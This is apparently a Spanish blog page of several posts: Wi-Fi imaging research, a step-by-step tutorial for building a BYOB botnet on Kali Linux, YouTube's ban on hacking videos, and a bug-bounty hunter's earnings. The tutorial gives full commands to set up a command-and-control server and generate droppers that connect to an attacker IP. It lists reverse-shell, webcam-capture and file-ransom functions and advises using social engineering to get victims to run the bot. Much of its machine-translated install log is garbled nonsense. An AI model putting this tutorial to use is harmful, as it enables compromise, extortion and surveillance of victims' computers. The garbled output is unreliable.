🙄 Conoce la tecnología que ayudará a ver a través de las paredes usando Wi-Fi

Los investigadores de la Universidad Técnica de Munich (TUM) han desarrollado un método para generar imágenes tridimensionales del entorno que nos rodea haciendo uso del Wi-Fi.😀

Todos sabemos que el Wi-Fi puede pasar a través de las paredes y de esta manera nos ayuda a navegar tranquilamente desde cualquier rincón de nuestro hogar. Pero, ¿Qué te parece si el Wi-Fi nos permite ver que hay más allá de las paredes?😀

Usando una propiedad de las conexiones inalámbricas, científicos alemanes han encontrado una manera de tomar imágenes en 3D u hologramas de objetos dentro de una habitación, desde otra

No es un concepto nuevo. En el pasado ya había una investigación sobre esta propiedad del Wi-Fi. El nuevo método fue desarrollado por Philip Holl y Friedemann Reinhard de la Universidad Técnica de Munich . “Los últimos dos años hemos visto un aumento de métodos para obtener imágenes mediante Wi-Fi”, dice Holl.😀


Usando dos antenas, graban un campo Wi-Fi que rodea a una habitación particular. Estas antenas se utilizan para capturar la intensidad y la fase del campo, tanto del punto de origen y de los lugares en donde rebota.
Como resultado, se obtiene una imagen holográfica de la habitación y esta se puede utilizar en diferentes tipos de situaciones. Puede ser utilizada en operaciones de rescate después de un desastre como un terremoto o una avalancha.🙄😶


A pesar de lo novedoso de la tecnología, ya salieron los primeros críticos que aseguran es una grave amenaza a la privacidad. Empero, uno de los investigadores resta importancia a este punto de vista asegurando que es poco probable que alguien se pasee con unas enormes antenas y no sea detectado.
¿Qué opinas de esta novedosa tecnología? Por favor comparte el post en las redes sociales.

Crea tu propia Botnet (TUTORIAL PASO A PASO)

Según los consultores de hacking ético, el malware ha existido en los mundos de Internet desde hace muchos años. Cuanto más nueva tecnología llega, más malware se propaga a través de Internet. Hoy vamos a hablar de botnet. La botnet es creada por un malware infectado, luego de lo cual el bot circula a través de una red. En el escenario de infectar ordenadores grandes se usa botnet. Debido a que botnet otorga privilegios para infectar a un gran grupo de computadoras, los maestros de hacking ético advierten. Las botnets se están convirtiendo en una gran parte de la seguridad cibernética. La mayoría de las empresas son objetivo utilizando botnets. La palabra botnet evoluciona de robot de red y red donde el robot está infectado por malware y luego se convierte en parte de cualquier red.

Según un investigador de hacking ético del International Institute of Cyber ​​Security, los bots se encontraban en las últimas noticias por atacar al sector financiero en Estados Unidos.

BYOB (Construye tu propia red de bots) es un código de Python de pocas líneas donde puedes crear tu propia red de bots usando algunos comandos simples. Este proyecto fue implementado para investigadores y desarrolladores de seguridad. Esta herramienta está diseñada para implementar algunas de sus propias características según el requisito. Para mostrarle que esta herramienta ha sido probada en Kali Linux 2018.3 como atacante, y construiremos un servidor BYOB en el mismo Linux Kali.

Para el tipo de clonación https://github.com/malwaredllc/byob.git

root @ kali: / home / iicybersecurity / Downloads # git clone https://github.com/malwaredllc/byob.git
 Clonación en 'byob' ... 
remoto: Enumerando objetos: 53, listo. 
remoto: contando objetos: 100% (53/53), hecho. 
remoto: Compresión de objetos: 100% (33/33), hecho. 
remoto: Total 1989 (delta 28), reutilizado 38 (delta 20), paquete reutilizado 1936 
Objetos de recepción: 100% (1989/1989), 1,37 MiB | 1.45 MiB / s, hecho. 
Resolución de deltas: 100% (1344/1344), hecho.
  • Entonces escribe cd byob
  • Escriba pip install -r Requirements.txt
root @ kali: / home / iicybersecurity / Downloads / byob / byob # pip install -r
 Requirements.txt Ignorando pyHook: markers 'sys_platform == "win32"' no coincide con su entorno 
Ignorando pypiwin32: markers 'sys_platform == "win32 "'no coincide con su entorno 
Recopilación de mss == 3.3.0 (de -r Requirements.txt (línea 1)) 
   Descargando https://files.pythonhosted.org/packages/d1/bc/1965b94c015666f0dce53248e219802137cfe3927109843706d7c4c48f78/os.jpg 0-py2.py3-none-any.whl 
Recopilación de WMI == 1.4.9 (de -r Requirements.txt (línea 2)) 
   Descargando https://files.pythonhosted.org/packages/03/2d/cbf13257c011vfccccccccccccccccccccccccccc07407c0115cccccccccccccccc034084cc70c540405cbd0cc02cccccccccccccccccccccccccccc03408411cec70c565405cbd01307cccccccccccccccccccccc07407c0115ccccccccccccc074074c074074003 -1.4.9.zip 
Recopilación de números == 1.15.2 (de -r Requirements.txt (línea 3))
   La descarga de https://files.pythonhosted.org/packages/a4/49/f454aa408e6b82d9fb95669f181415db915dadb27127ee475eccf1eecddd/numpy-1.15.2-cp27-cp27mu-manylinux1_i686.whl (10.1MB) 
     100% | ███████████ █████████████████████ | 10.1MB 2.1kB / s 
Recopilación de pyxhook == 1.0.0 (de -r Requirements.txt (línea 4)) 
   Descargando https://files.pythonhosted.org/packages/70/d1/8f56e13b002502ad85975f2dcebb5d1026551e34cafc77a13b002502adv.jpg tar.gz 
Recopilación de twilio == 6.14.0 (de -r Requirements.txt (línea 5)) 
   Descargando https://files.pythonhosted.org/packages/4c/b5/f341339851a53a76dd476979pppp. -none-any.whl (821kB) 
     100% | ████████████████████████████████ | 829kB 482kB / s
Recolección de colorama == 0.3.9 (de -r Requirements.txt (línea 6)) 
   Descargando https://files.pythonhosted.org/packages/db/c8/7dcf9dbcb22429512708fe3a547f8b6101c0d02137aciquina92505aee57adocompas.com any.whl 
Requisito ya cumplido: solicitudes == 2.20.0 en /usr/local/lib/python2.7/dist-packages/requests-2.20.0-py2.7.egg (de -r Requirements.txt (línea 7 )) (2.20.0) 
Recopilación de PyInstaller == 3.3.1 (de -r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/3c/86/909a8c35c5471919b3854c01f43843d9b5aed0e9948b63pc.p.p.p.p.p.p.p.p.p.c.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.p.cf) .tar.gz (3.5MB) 
     100% | ████████████████████████████████ | 3.5MB 111kB / s 
Recopilando opencv-python == 3.4.3.18 (de -r Requirements.txt (línea 9))
   Descargando https://files.pythonhosted.org/packages/6c/03/3f11eec70d964cf28afb37c7778e1acbb8632afd78b288dd9fe74080c712ux1peapacioplanque de las partes de las 
     personas. █████████████████████ | 24.9MB 2.3kB / s 
Recopilación de python-xlib (de pyxhook == 1.0.0 -> - r Requirements.txt (línea 4)) 
   Descargando https://files.pythonhosted.org/packages/54 / ctgggggggggggggggggggggggggggggggg2303e635e635d6333e635d6333e635d6333e635d633d6333e635d633d6333e635d633d63386008 -0.23-py2.py3-none-any.whl (123kB) 
     100% | | 133kB 1.7MB / s 
Requisito ya cumplido: seis en /usr/lib/python2.7/dist-packages (desde twilio == 6.14.0 -> - r Requirements.txt (línea 5)) (1.11.0)
Requisito ya cumplido: pytz en /usr/lib/python2.7/dist-packages (de twilio == 6.14.0 -> - r Requirements.txt (línea 5)) (2018.5) 
Requisito ya cumplido: PyJWT> = 1.4. 2 en /usr/lib/python2.7/dist-packages (de twilio == 6.14.0 -> - r Requirements.txt (línea 5)) (1.6.4) 
Requisito ya cumplido: certifi> = 2017.4.17 in /usr/lib/python2.7/dist-packages (de solicitudes == 2.20.0 -> - r Requirements.txt (línea 7)) (2018.4.16) 
Requisito ya cumplido: chardet <3.1.0,> = 3.0 .2 en /usr/lib/python2.7/dist-packages (de peticiones == 2.20.0 -> - r Requirements.txt (línea 7)) (3.0.4) 
Requisito ya cumplido: idna <2.8,> = 2.5 en /usr/lib/python2.7/dist-packages (de solicitudes == 2.20.0 -> - r Requirements.txt (línea 7)) (2.6)
Requisito ya cumplido: urllib3 <1.25,> = 1.21.1 en /usr/lib/python2.7/dist-packages (de solicitudes == 2.20.0 -> - r Requirements.txt (línea 7)) (1.22) 
Recopilación dis3 (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/9c/5c/4a4a2802f10f558018413990a58fd3dd7ed1eb48e6de7266334c2489b2489bik89b98999.pcn.pdf any.whl 
Recolectando macholib> = 1.8 (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/41/f1/6d23e08ascasas de las costillas -py2.py3-none-any.whl 
Requisito ya cumplido: pefile> = 2017.8.1 en /usr/lib/python2.7/dist-packages (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) (2017.11.5)
Requisito ya cumplido: setuptools en /usr/lib/python2.7/dist-packages (de PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) (39.2.0) 
Recopilación de altgraph> = 0.15 (de macholib> = 1.8-> PyInstaller == 3.3.1 -> - r Requirements.txt (línea 8)) 
   Descargando https://files.pythonhosted.org/packages/0a/cc/646187eac4b797069epepía de las partes de los casos de las personas. .py3-ninguno-any.whl 
ruedas de construcción para paquetes recogidos: WMI, pyxhook, PyInstaller 
   Correr bdist_wheel setup.py para WMI ... hace 
   almacenados en el directorio: /root/.cache/pip/wheels/f3/c8/24/dc2368d129e5b249d163cbe365b993ad89ae6bb2371008a129 
   de reproducción setup.py bdist_wheel para pyxhook ... hecho
   Almacenado en el directorio: /root/.cache/pip/wheels/50/45/1b/855ffad848a142c0a7076635f437b54b20afc96588495905a1 
   Correr bdist_wheel setup.py para PyInstaller ... hecho 
   almacenado en el directorio: /root/.cache/pip/wheels/b8/ec/c5/ 6b63d5d1ecfe8bf1b3ae768b793b1643e19dde790de6363c4c 
Construyó exitosamente WMI pyxhook PyInstaller 
Instalando los paquetes recolectados: las partes de las partes de las partes de los equipos, partes de las partes de las partes de los animales, partes de las partes de los animales, partes de las partes de los equipos, partes de 
   las partes de las partes de los 
     animales, usr / lib / python2.7 / dist-packages, entorno externo / usr 
     No se puede desinstalar 'numpy'. No se encontraron archivos para desinstalar. 
   Instalación existente encontrada: colorama 0.3.7
     No desinstalar colorama en / usr/lib/python2.7/dist-packages, outside environment / usr 
     No se puede desinstalar 'colorama'. No se encontraron archivos para desinstalar. 
PyInstaller-3.3.1 WMI-1.4.9 altgraph-0.16.1 colorama-0.3.9 dis3-0.1.3 instalado macholib-1.11 mss-3.3.0 numpy-1.15.2 opencv-python-3.4.3.18 python-xlib -0.23 pyxhook-1.0.0 twilio-6.14.0
  • Escribe python setup.py
  • Después de pulsar enter se le pedirá la contraseña. Simplemente ingrese la contraseña de Kali Linux.
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python setup.py
Ingrese su contraseña de sudo (para instalar las dependencias de python):
Instalando mss == 3.3.0…
Instalando WMI == 1.4.9…
Instalando numpy == 1.15.2…
Instalando pyxhook == 1.0.0…
Instalando twilio == 6.14.0…
Instalando colorama == 0.3.9…
Instalando solicitudes == 2.20.0…
Instalando PyInstaller == 3.3.1…
Instalando opencv-python == 3.4.3.18…
Instalando pyHook == 1.5.1; sys.platform == 'win32'…
Instalando pypiwin32 == 223; sys.platform == 'win32'…
  • Aquí se utilizarán dos terminales , el primer terminal será el Servidor Bot donde se manejarán las sesiones y el segundo terminal el Cliente Bot donde se crearán los robots.
  • Después de instalar todas las dependencias, escriba python server.py –port 445
  • el puerto 445 se utiliza para iniciar el servidor en este puerto en particular. Puede asignar cualquiera de los puertos.
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python server.py --port 445

Después de iniciar la ayuda del tipo de servidor para ver algunos comandos importantes del servidor bot.

[root @ / home / iicybersecurity / Downloads / byob / byob]> help
 [?] Sugerencia: muestre la información de uso con el comando 'help' 

bg [id] en el fondo de una sesión (por defecto: la sesión actual) 
  transmita una tarea a todos los 
  clientes de sesiones activas muestran todos los clientes que se han unido a la 
  depuración del servidor                    run python code directly on server (debugging MUST be enabled)
  exit                            quit the server
  help                            show usage help for server commands
  kill                        end a session
  options                         show currently configured settings
  query                query the SQLite database
  ransom [id]                     encrypt client files & ransom encryption key for a Bitcoin payment
  results [id]                    display all completed task results for a client (default: all clients)
  sessions                        show active client sessions
  set  [option=value]    change the value of a setting
  shell                       interact with a client with a reverse TCP shell through an active session
  tasks [id]                      display all incomplete tasks for a client (default: all clients)
  webcam                    capture image/video from the webcam of a client device 
  • Luego abre otra terminal de linux.
  • Escriba cd / home / iicybersecurity / Downloads / byob / byob
  • Luego escriba python client.py –help
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python client.py --help 
use: client.py [-h] [--name NAME] [--icon ICON] [--pastebin API] [ --encrypt]
[--compress] [--freeze] [-v]
host host [module [module ...]] Argumentos posicionales del


generador (Build Your Own Botnet)


:
servidor IP dirección
servidor puerto puerto número de puerto
módulo módulo (s) módulo (s) para importar remotamente en el tiempo de ejecución los


argumentos opcionales:
-h, --help muestra este mensaje de ayuda y sale
--nombre NOMBRE nombre de archivo de salida
- icono de icono ICON nombre de archivo de imagen
- API de Pastebin carga la carga útil en Pastebin (en lugar de Servidor C2
que lo aloja)
--cifrar cifrar la carga útil con una clave aleatoria de 128 bits incrustada en
el
stager de la carga útil --comprimir zip-compress en un script de Python autoextraíble
--freeze compilar el cliente en un ejecutable independiente para la
plataforma host actual
-v, - Versión Mostrar el número de versión del programa y salir.
  • Escriba python client.py –name testbot.py 192.168.1.7 445
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python client.py --name testbot.py
  • –Nombre se usa para ingresar el nombre de la botnet. Aquí el nombre del bot es testbot.py
  • 192.168.1.7 es la dirección IP del atacante.
  • 445 es el mismo puerto que se usa para asignar el servidor de botnet en 445. Debe ingresar el mismo número de puerto que se asignó en el servidor de bot.
[>] Módulos de 
Adición de módulos ... (3 módulos añadido al cliente)
[>] Las importaciones
Adición de importaciones ... - (26 importaciones de 3 módulos)
[>] de carga útil
de carga útil Comprimir ... (121,261 bytes reducen a 64,855 bytes (-47,0% más pequeño)
Carga Carga útil ... - (carga útil de alojamiento en: http://192.168.1.7:4446//payloads/a5o.py)
[>] Stager
Compressing stager… - (2,194 bytes reducido a 2,159 bytes (-2.0% más pequeño)
Cargando stager ... ( stager de hosting en: http://192.168.1.7:4446//stagers/a5o.py)
[>] Dropper
Writing dropper ... (203 bytes escritos en testbot.py )
  • Después de ejecutar la consulta anterior, se creará una nueva botnet. La consulta anterior se ejecutará.
  • Ahora puedes usar cualquier truco de ingeniería social para abrir bot en su computadora.
  • Aquí tenemos dos objetivos. El primero es el Linux y el segundo es el Windows.
  • Ahora tenemos botnet abierto en la máquina de destino de Linux.
  • Para abrir bot, simplemente escriba python testbot.py en el terminal Linux de destino.
root @ times: / Downloads / python testbot.py

Cuando la consulta anterior se ejecuta en la máquina de destino. Se creará una sesión en el servidor botnet.

[+] Nueva conexión: 192.168.1.10

Sesión: 2 

Comenzó: mar 22 de enero 05:14:24 2019
  • La conexión anterior se creará cuando el bot se ejecute en la máquina de destino.
  • Para verificar la sesión, vaya al terminal del servidor bot donde se ejecuta el servidor bot y escriba sesiones
[root @ / home / iicybersecurity / Downloads / byob / byob]> session 

1
nombre de usuario
administrador de root True
uid c94e3a38e43e74bb4f667d86d21a7574
session True
mac_address C2: 97: F3: 9F: 2:
local_ip 127.0.1.1
ingresado en 2019-01-22 05:14: 24.809827
last_online 2019-01-22 07: 12: 52.295591
public_ip 146.196.34.40
plataforma linux2
architecture 64 en
línea True
device kali
  • Como puedes ver, el objetivo se muestra verdadero. Eso significa que bot está completamente configurado en la máquina de destino.
  • Ahora puedes ejecutar varios comandos para manipular el objetivo.

MÁQUINA DE WINDOWS DE DESTINO: –

  • Ahora para crear para Windows bot tipo python client.py –name testbot2.py –freeze 192.168.1.7 445 en el terminal de Linux.
  • –Nombre se usa para ingresar el nombre del bot. Aquí el nombre del bot es testbot2.py
  • –Freeze se utiliza para crear el archivo ejecutable de Windows.
  • 192.168.1.7 es la dirección IP del atacante.
  • 445 es el mismo puerto que se usa para asignar el servidor de botnet en 445. Debe ingresar el mismo número de puerto que se asignó en el servidor de bot.
root @ kali: / home / iicybersecurity / Downloads / byob / byob # python client.py --name testbot2.py --freeze 192.168.1.7 445


 [>] Módulos 
         Adición de módulos ... - (3 módulos agregados al cliente) 
[>] Importaciones 
         Agregar importaciones ..- (26 importaciones desde 3 módulos) 
[>] Carga de carga Carga útil ... - (carga de hosting en: http://192.168.1.8:446//payloads/l3p.py) 
[>] Stager 
         Cargando carga stager ... (hosting stager en: http://192.168.1.8:446//stagers/l3p.py) 
[>] Dropper 
         Writing dropper ... (203 bytes escritos en testbot2.py)
         Compilación del ejecutable ... 13014 INFO: PyInstaller: 3.3.1 
13014 INFO: Python: 2.7.15+ 
13015 INFO: Plataforma: Linux-4.17.0-kali1-686-pae-i686-with-Kali-kali-rolling-kali-rolling 
13130 ​​INFO: UPX está disponible. 
13210 INFO: Extendiendo PYTHONPATH con rutas 
['/ home / iicybersecurity / Downloads / byob', 
  '/ home / iicybersecurity / Downloads / byob / byob'] 
13210 INFO: Encriptará el bytecode de Python con la clave: 34jZd5tQSBJwEuK2 
13210 INFO: Dependencia de las dependencias .py módulo 
13211 INFO: verificación Análisis 
13211 INFO: Análisis de construcción porque out00-Analysis.toc no existe
13211 INFO: Inicializando el gráfico de dependencia del módulo ... 
13252 INFO: Inicializando los ganchos del gráfico del módulo ... 
13285 INFO: Analizando la importación oculta 'base64' 
16343 INFO: Analizando la importación oculta 'json' 
16556 INFO: Analizando la importación oculta 'zlib' 
16557 INFO: Analizando la importación oculta ' urllib ' 
17744 INFO: analizando la importación oculta' 
uuid ' 17992 INFO: analizando la importación oculta' numpy ' 
34445 INFO: Procesando el gancho del módulo de importación pre-seguro _xmlplus 
39010 INFO: Procesando los datos del gancho de la ruta del módulo de pre-búsqueda 
81800 INFO: Procesando la importación pre-segura módulo hook six.moves 
95678 INFO: Análisis de importación oculta 'colorama' 
96647 INFO: Análisis de 'solicitudes' de importación oculta
114809 INFO: analizando la importación oculta 'Crypto.Cipher._AES' 
115242 INFO: ejecutando Analysis out00-Analysis.toc 
115311 INFO: Almacenamiento en caché del módulo ... 
115434 INFO: Analizando /home/iicybersecurity/Downloads/byob/byob/testbot2.py 
115471 INFO : Cargando ganchos de módulo ... 
115472 INFO: Cargando gancho de módulo "hook-distutils.py" ... 
116244 INFO: Cargando gancho de módulo "hook-sysconfig.py" ... 
116290 INFO: Cargando módulo ganchos "hook-xml.py" ... 
116348 INFO: Cargando el gancho del módulo "hook-httplib.py" ... 
116351 INFO: Cargando el gancho del módulo "hook-pydoc.py" ... 
116361 INFO: Excluyendo importación 'Tkinter' 
116368 INFO: Eliminando la importación de Tkinter del módulo pydoc 
116368 INFO: Cargando gancho del módulo "hook-encodings.py "…
121171 INFO: Cargando el gancho del módulo "hook-_tkinter.py"… 
122361 INFO: revisando el árbol 
122361 INFO: Construyendo el árbol porque out00-Tree.toc no existe 
122361 INFO: Construyendo el árbol out00-Tree.toc 
122453 INFO: comprobando el árbol 
122453 INFO : Building Tree porque out01-Tree.toc no existe 
122453 INFO: Building Tree out01-Tree.toc 
122482 INFO: Cargando módulo gancho "hook-xml.domreg.py"… 
122509 INFO: Cargando módulo hook "hook-pkg_resources .py "... 
123352 INFO: Procesando el gancho del módulo de importación pre-seguro win32com 
123752 INFO: Cargando el gancho del módulo" hook-requests.py "... 
123816 INFO: Cargando el gancho del módulo" hook-certifi.py "... 
124009 INFO: Cargando el gancho del módulo" herramientas de configuración de gancho.py "...
124141 INFO: Cargando el gancho del módulo "hook-cryptography.py"… 
126355 INFO: Cargando el gancho del módulo "hook-pytest.py"… 
130654 INFO: Cargando el gancho del módulo "hook-numpy.core.py" ... 
130910 INFORMACIÓN: revisando el árbol 
130910 INFO: Building Tree porque out02-Tree.toc no existe. 
130910 INFO: Building Tree out02-Tree.toc. 
130912 INFO: buscando ctypes DLLs 
132082 INFO: analizando enganches en tiempo de 
ejecución ... 132110 INFO: incluyendo gancho en tiempo de ejecución 'pyi_rth__tkinter. py ' 
132172 INFO: Incluye el tiempo de ejecución' pyi_rth_multiprocessing.py ' 
132189 INFO: Incluye el tiempo de ejecución' 
pyi_rth_pkgres.py ' 132225 INFO: Buscando bibliotecas dinámicas 
134508 INFO: Buscando huevos
134509 INFO: la biblioteca de Python no está en dependencias binarias. Haciendo búsquedas adicionales ... 
135303 INFO: Usando la biblioteca de Python /lib/i386-linux-gnu/libpython2.7.so.1.0 
135334 INFO: Advertencias escritas en /home/iicybersecurity/Downloads/byob/byob/build/testbot2/warntestbot.txt 
136600 INFO: Referencia cruzada del gráfico escrita en /home/iicybersecurity/Downloads/byob/byob/build/testbot2/xref-testbot2.html 
137198 INFO: comprobando PYZ 
137199 INFO: Construyendo PYZ porque out00-PYZ.toc no existe 
137199 INFO : Building PYZ (ZlibArchive) /home/iicybersecurity/Downloads/byob/byob/build/testbot2/out00-PYZ.pyz 
140632 INFO: Building PYZ (ZlibArchive) / home / iicybersecurity / Downloads / byob / byob / byob / byob / bybob / quad / testbot2 / out00 -PYZ.pyz completado con éxito.
141007 INFO: comprobando PKG 
141008 INFO: generando PKG porque out00-PKG.toc no existe. 
141008 INFO: generando PKG (CArchive) out00-PKG.pkg 
161496 INFO: construyendo PKG (CArchive) out00-PKG.pkg se completó correctamente. 
161599 INFO: Bootloader /usr/local/lib/python2.7/dist-packages/PyInstaller/bootloader/Linux-32bit/run 
161599 INFO: verificando EXE 
161599 INFO: Construyendo EXE porque out00-EXE.toc no existe 
161600 INFO: Construyendo EXE desde out00-EXE.toc 
162033 INFO: Agregando archivo a la sección ELF en EXE / home / iicybersecurity / Downloads / byob / byob / dist / testbot2 
163893 INFO: Construyendo EXE desde out00-EXE.toc se completó con éxito.
 (24,818,636 bytes guardados en el archivo: / home / iicybersecurity / Downloads / byob / byob / dist / testbot2)
  • Después de ejecutar la consulta anterior se crearán dos archivos. testbot2.py & testbot2.spec
  • Cambie el nombre de testbot2.spec a testbot2.exe.
  • Para cambiar el nombre, escriba mv testbot2.spec testbot2.exe
root @ kali: / home / iicybersecurity / Downloads / byob / byob # mv testbot2.spec testbot2.exe
 root @ kali: / home / iicybersecurity / Downloads / byob / byob #
  • Ahora tenemos botnet abierto en la máquina de Windows de destino.
  • Para ejecutar bot en windows target machine. Python 2.7 debe estar instalado y las variables de entorno deben configurarse para ejecutar bot.
  • Para configurar el entorno PATH de Python, vaya a: https://www.python.org/download/releases/2.7/
  • Luego abra Propiedades de Mi PC> Configuración avanzada del sistema> Variables de entorno> Variables del sistema .
  • Haga clic en Nuevo e ingrese el Nombre de la variable: Ruta Variable Ruta: ruta \ a \ su \ python \ instalador
  • Para comprobar si Python se ha configurado correctamente. Abra cmd en la máquina de Windows y escriba python –version
  • Después de configurar python, ejecuta bot en cmd .
  • Para abrir el tipo de bot, ejecute testbot2.exe en Windows CMD.
  • Cuando la consulta anterior se ejecuta en la máquina de destino. Se creará una sesión en el servidor botnet.
  • Para comprobar la sesión, escriba clientes
[root @ / home / iicybersecurity / Descargas / BYOB / BYOB] 
> clientes 
 1` 
    nombre de usuario iicybersecurity 
    administrador verdadera 
    7ac235609435c8a16adc9049ec187daa UID 
    sesiones verdadera 
    mac_address D4: 52: 2A: 45: 31: E4 
    local_ip 169.254.123.37 
    unieron 01/23/2019 06: 21: 27.582403 
    last_online 2019-01-23 07: 22: 15.861055 
    public_ip 27.5.19.124 
    plataforma win32 
    architecture 32 en 
    línea True
    dispositivo WIN-31VSBP3FUQT
  • Como puedes ver, el objetivo se muestra verdadero. Eso significa que bot está completamente configurado en la máquina de destino.
  • Ahora puedes ejecutar varios comandos para manipular el objetivo.
  • Como bot también se puede utilizar en ataques de ingeniería social. También hay otras formas de secuestrar a cualquier usuario que use trevarc2 , lo que le ayudará a tomar el control de la máquina de destino.

Youtube Prohibe los vídeos sobre “Hacking y Phishing”

A medida que la cantidad de usuarios en la plataforma ha aumentado con los años, también lo ha hecho la lista de ‘contenido prohibido’ de YouTube. Añadiendo más a la lista, YouTube ha prohibido los vídeos de ‘Hacking informático y phishing’.

Las últimas prohibiciones han llevado a la eliminación de varios videos educativos sobre Hacking ético, ya que ahora violan los Términos de servicio de YouTube. La lista también incluye “retos extremadamente peligrosos”, “trastornos de la alimentación” y “eventos violentos” como categorías prohibidas.

Los videos de hacking y phishing instructivos se identifican como aquellos que “muestran a los usuarios cómo evitar los sistemas informáticos seguros o robar las credenciales de los usuarios y los datos personales”.

YouTube ha comenzado a eliminar tales videos y varios creadores de YouTube se quejan de lo mismo. Uno de esos canales es Null Byte, que publica “videos para aspirantes a hackers ético y ciencias de la computación”.

Kody Kinzie, miembro de Null Byte, dijo que sus videos habían sido marcados y extraídos. También se les impidió subir nuevos videos durante una semana.

Después de mucha protesta, YouTube restauró los videos en Null Byte, pero no se puede decir lo mismo de todos los canales en la plataforma.

Toda esta debacle ha hecho enojar a los informáticos y los aspirantes a programadores que están involucrados en el hackers ético y que crean o consumen dicho contenido.

Es triste ver que un sitio como YouTube está comparando vídeos que enseñan a las personas a proteger dispositivos junto con respecto al contenido que puede arriesgar la vida de alguien.

Esto nos lleva a la pregunta más importante: ¿Debería YouTube prohibir los videos que enseñan algo útil pero al mismo tiempo podrían usarse de manera dañina?

Joven Hacker de 19 años Ganó US$1 Millón encontrando errores informáticos ⚡

A sus 19 años, el argentino Santiago López ha hecho historia: es el primer hacker ético en alcanzar la suma de US$1 millón descubriendo errores informáticos.

Es lo que en inglés se conoce como un bug-bounty hacker (o bug bounters), que en español se traduce como cazarrecompensas en internet o hacker â€œde sombrero blanco”.

Su trabajo consiste en hacer la red más segura detectando y solucionando los puntos débiles y las fallas de software antes de que lo hagan otros. Hay muchas empresas dispuestas a pagar altas sumas de dinero a quienes sean capaces de hacerlo.

Facebook, Google, Apple, Yahoo, Nintendo, Lufthansa, General Motors y otras grandes empresas e instituciones contratan a este tipo de hackers para mejorar su seguridad cibernética. Muchos de ellos son adolescentes.

López trabaja arreglando los sitios webs grandes compañías y ha logrado hacer una fortuna con su talento informático.

Tanto es así que se ha convertido en millonario, obteniendo unos ingresos que equivalen a 40 veces el salario promedio anual en Argentina.

Más de 1.600 “bugs”

“He ayudado a Twitter, Verizon, empresas privadas y al gobierno de Estados Unidos”, le contó al periodista de la BBC Joe Tidy. Y dice que se siente bien al saber que está mejorando internet.

“Con cada bug (errores que descubre y arregla) haces internet más segura. Es impresionante”.

En total, ha encontrado más de 1.600 errores informáticos, lo cual ha permitido proteger a millones de internautas de posibles ataques cibernéticos.

Lo ha logrado a través de la mayor plataforma de hacking ético del mundo: HackerOne, una compañía con base en San Francisco, EE.UU., para la que trabajan hackers éticos de todo el mundo.

Los hackers suelen recibir entre US$50 y US$500.000 por apenas dos horas de trabajo.

Cientos de empresas se han asociado con HackerOne, que ya ha superado el récord de 100.000 vulnerabilidades encontradas. La suma destinada a las recompensas para los hackers excede los US$45 millones.

“La percepción sobre los hackers está cambiando”, declaró Luke Tucker, director de contenido y comunidad en HackerOne.